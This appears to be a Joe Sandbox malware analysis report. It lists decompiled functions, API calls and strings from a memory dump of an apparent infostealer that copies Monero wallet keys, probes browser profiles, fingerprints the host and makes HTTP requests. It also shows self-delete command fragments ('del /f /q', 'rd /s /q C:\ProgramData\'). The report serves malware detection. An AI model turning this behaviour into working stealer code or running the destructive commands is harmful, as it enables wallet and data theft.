" & rd /s /q "C:\ProgramData\, xrefs: 00418333
" & exit, xrefs: 00418389

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

QuBi, xrefs: 00410A27
wA, xrefs: 00410B21
C, xrefs: 004109DF
:\, xrefs: 00410A06

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: wA$:\$C$QuBi
API String ID: 1856320939-1441494722
Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54

Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

Strings

%s\%s, xrefs: 004112D7
?, xrefs: 00411263
- , xrefs: 004113E6

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 1736561257-3278919252
Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Strings

<+A, xrefs: 00406954

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: <+A
API String ID: 2507841554-2778417545
Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9

Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
lstrlenA.KERNEL32(?), ref: 00416925

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 0041693A
lstrlenA.KERNEL32(?), ref: 00416949
lstrlenA.KERNEL32(00000000), ref: 00416962

Strings

ERROR, xrefs: 00416977
ERROR, xrefs: 00416985
ERROR, xrefs: 00416914
ERROR, xrefs: 0041696D
ERROR, xrefs: 0041697E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99

Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40

Strings

firefox, xrefs: 0040EE17
Stable\, xrefs: 0040EB71
Stable\, xrefs: 0040ED5B

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9

Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

CopyFileA.KERNEL32(?,?,00000001,0043A99C,004369EF,\Monero\wallet.keys,004369EE), ref: 00401C2A

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 00401C9D

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

.keys, xrefs: 00401B0D
\Monero\wallet.keys, xrefs: 00401B2F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCreateHeaplstrlen$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 2771091047-3586502688
Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58

Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
lstrcatA.KERNEL32(?,?), ref: 00415EC2
lstrcatA.KERNEL32(?,?), ref: 00415ED6
lstrcatA.KERNEL32(?), ref: 00415EE9
lstrcatA.KERNEL32(?,?), ref: 00415EFD
lstrcatA.KERNEL32(?), ref: 00415F10

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9

Strings

LzA, xrefs: 00415FC2

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID: LzA
API String ID: 1968765330-1388989900
Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

